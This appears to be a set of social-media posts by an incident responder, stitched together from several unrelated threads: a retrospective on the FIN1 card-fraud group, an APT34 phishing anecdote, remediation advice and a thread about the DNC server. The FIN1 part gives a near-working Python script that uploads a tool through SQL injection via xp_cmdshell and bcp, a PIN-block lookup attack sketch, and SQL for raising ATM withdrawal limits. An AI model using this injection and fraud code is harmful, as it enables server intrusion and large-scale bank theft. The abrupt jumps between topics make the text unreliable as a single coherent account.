Reading justice.gov/opa/pr/russian… today reminded me how I got my start in #DFIR in 2008 investigating FIN1. Let's take a walk down memory lane.
FIN1 (in my experience) has had a few major periods of activity (2007-2009, 2011-2012, and 2014-2015) - each with their own distinct set of TTPs. They've significantly improved their capabilities over the years (even though multiple members have been arrested)
FIN1 in the first period had the following TTPs: 1) didn't use backdoors 2) commonly broke in via SQL injection 3) uploaded new tools by creating temporary tables and exporting the contents to a file via BCP 4) deployed a sniffer named sn.exe to identify systems with track data in memory
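For anyone who hasn't seen the BCP trick: below is a rough sketch of that staging pattern, written as Python driving SQL through an injection point. The endpoint, table, and file names are all hypothetical, and it assumes stacked queries plus xp_cmdshell are reachable - it's the shape of the technique, not FIN1's actual tooling.

```python
# Rough sketch of the temp-table + BCP staging pattern (all names hypothetical;
# assumes stacked queries and xp_cmdshell are reachable via the injection point).
import requests

INJECT_URL = "http://victim.example/search"  # hypothetical injectable endpoint

def inject(sql: str) -> None:
    """Smuggle a stacked query through the vulnerable parameter."""
    requests.get(INJECT_URL, params={"q": f"x'; {sql} --"}, timeout=10)

# 1) Create a staging table in tempdb to hold the tool as raw bytes.
inject("CREATE TABLE tempdb..staging (chunk VARBINARY(MAX))")

# 2) Push the binary up in hex-encoded chunks (0x... binary literals).
with open("sn.exe", "rb") as f:
    payload = f.read()
for i in range(0, len(payload), 4000):
    inject(f"INSERT INTO tempdb..staging (chunk) VALUES (0x{payload[i:i+4000].hex()})")

# 3) Have bcp write the table contents out to disk on the database server.
#    (Real tooling needs a format file for byte-exact output; this is simplified.)
inject(
    "EXEC master..xp_cmdshell "
    "'bcp \"SELECT chunk FROM tempdb..staging\" queryout C:\\Temp\\sn.exe -T -n'"
)
```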
FIN1 already had intimate knowledge of financial orgs - including how debit card PINs were encrypted, and the hardware security module (HSM) devices and protocols used to encrypt/decrypt those PINs.
I once observed FIN1 identify the HSM, enumerate the protocols it supported, and use it to execute an encryption protocol downgrade attack. The benefit: they turned a PIN block (an encrypted version of a PIN) that used salting into a version with no salt applied.
This allowed FIN1 to compute the PIN block for every possible PIN (0000 to 9999) with the downgraded encryption protocol - and then perform a lookup against the downgraded PIN blocks.
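To make the math concrete - once the salt is gone, the same PIN always produces the same PIN block regardless of card, so a 10,000-entry table breaks everything. A minimal sketch of the lookup, where the encryption function is just a stand-in for whatever downgraded protocol the HSM exposed (not the real one):

```python
# Lookup-table attack enabled by the downgrade. The "encryption" below is a
# placeholder (assumption) for the unsalted protocol the HSM was tricked into
# using - the point is that PIN -> PIN block becomes deterministic and
# card-independent, so 10,000 precomputed entries cover every possible PIN.
import hashlib

ZONE_KEY = b"stand-in-for-the-real-pin-key"

def downgraded_pin_block(pin: str) -> bytes:
    """Placeholder for the downgraded (unsalted) encryption protocol."""
    return hashlib.sha256(ZONE_KEY + pin.encode()).digest()

# Precompute the block for every possible 4-digit PIN once...
lookup = {downgraded_pin_block(f"{p:04d}"): f"{p:04d}" for p in range(10000)}

# ...then every captured, downgraded PIN block is a simple dictionary hit.
def recover_pin(captured_block: bytes) -> str | None:
    return lookup.get(captured_block)
```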
FIN1 also knew enough about how financial orgs limited ATM withdrawals - & knew (or figured out) how to increase the database limits that control # withdrawals per ATM, # withdrawals per day & total amount allowed per day. They raised the limits to the max - and cashed out millions
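The limit changes themselves don't require anything exotic once you have database access - conceptually just a few UPDATEs against the issuer's card-management tables. Purely illustrative (the schema, column names and card number below are made up):

```python
# Illustrative only - hypothetical schema/column names for the kind of limit
# tampering described above. The PAN is a standard test card number.
CASHOUT_CARDS = ["4111111111111111"]

def limit_bump_sql(pan: str) -> str:
    """Build the (hypothetical) UPDATE that maxes out a card's withdrawal limits."""
    return (
        "UPDATE card_limits "
        "SET max_withdrawals_per_atm = 999999, "
        "    max_withdrawals_per_day = 999999, "
        "    max_amount_per_day = 999999999 "
        f"WHERE pan = '{pan}'"
    )

for pan in CASHOUT_CARDS:
    print(limit_bump_sql(pan))  # executed via whatever DB access the attacker already had
```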
FIN1 only needed 20-30 cards w/ increased limits to perform the cash out. My theory was - they gave a single debit card number to each cash out team. That way they could query the db and know exactly how much that "team" stole - so they could pay a % back to the central org
FIN1 in this period was characterized by low opsec & significant knowledge of financial systems/orgs (they might have worked in fin orgs before). For me at the time - as a pen tester who knew SQLi really well - FIN1 had amazing SQLi capabilities. They did things I had no idea were possible
A C-level exec's credentials were phished while they were on vacation - APT34 then used the account access to phish the entire company. Even though the infosec team blocked the URL on the web proxy, employees switched to guest wi-fi to access the URL.
Remediation strategy in #DFIR is always a fun topic - with many opinions & not always a clear rule book to follow. It's like the English language: for every rule there are 5 exceptions. My views have evolved over time - from a combo of experience & as monitoring tools have improved
If you catch the attacker early in the attack lifecycle - this one is pretty easy. Take action immediately before they get a strong foothold. Very few exceptions to this rule. Tipoffs you are early in the attack lifecycle: malware owned by the primary user of the system, or malware in the startup folder
Opposite end of the spectrum - if the attacker has been there for months/years - it will take at the very (and I mean very) least a few days to get a bare-minimum handle on which systems are infected & how the attacker is accessing the environment. The bigger challenge is the client's ability to take "big" remediation steps
Here is a thread on the "missing" DNC server and my experience/advice from conducting similar investigations.
First, some background for my comments. Over the last decade, I've personally led investigations at over 100 organizations & taught dozens of classes for both federal law enforcement and the private sector on incident response and digital forensics.
I've never once physically acquired a server or asked someone to physically acquire a server. Literally the first thing you learn in digital forensics is how to take a forensic image (or in layman's terms, a complete copy of a computer).
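For the non-forensics crowd: a forensic image is a bit-for-bit copy of the drive, hashed so you can later prove the copy matches the original. Conceptually it's nothing more than the sketch below (in practice you'd use dd/dc3dd/FTK Imager with a write blocker - the device path here is just an example):

```python
# Conceptual sketch of a forensic image: read the source device bit-for-bit,
# write an identical copy, and hash the stream so the copy can be verified later.
# (In practice, use purpose-built imaging tools and a hardware write blocker;
# the device path below is only an example.)
import hashlib

SOURCE = "/dev/sdb"   # example: the evidence drive
IMAGE = "sdb.dd"      # destination image file
CHUNK = 4 * 1024 * 1024

sha256 = hashlib.sha256()
with open(SOURCE, "rb") as src, open(IMAGE, "wb") as dst:
    while True:
        block = src.read(CHUNK)
        if not block:
            break
        dst.write(block)
        sha256.update(block)

print("image hash:", sha256.hexdigest())  # record this for verification/chain of custody
```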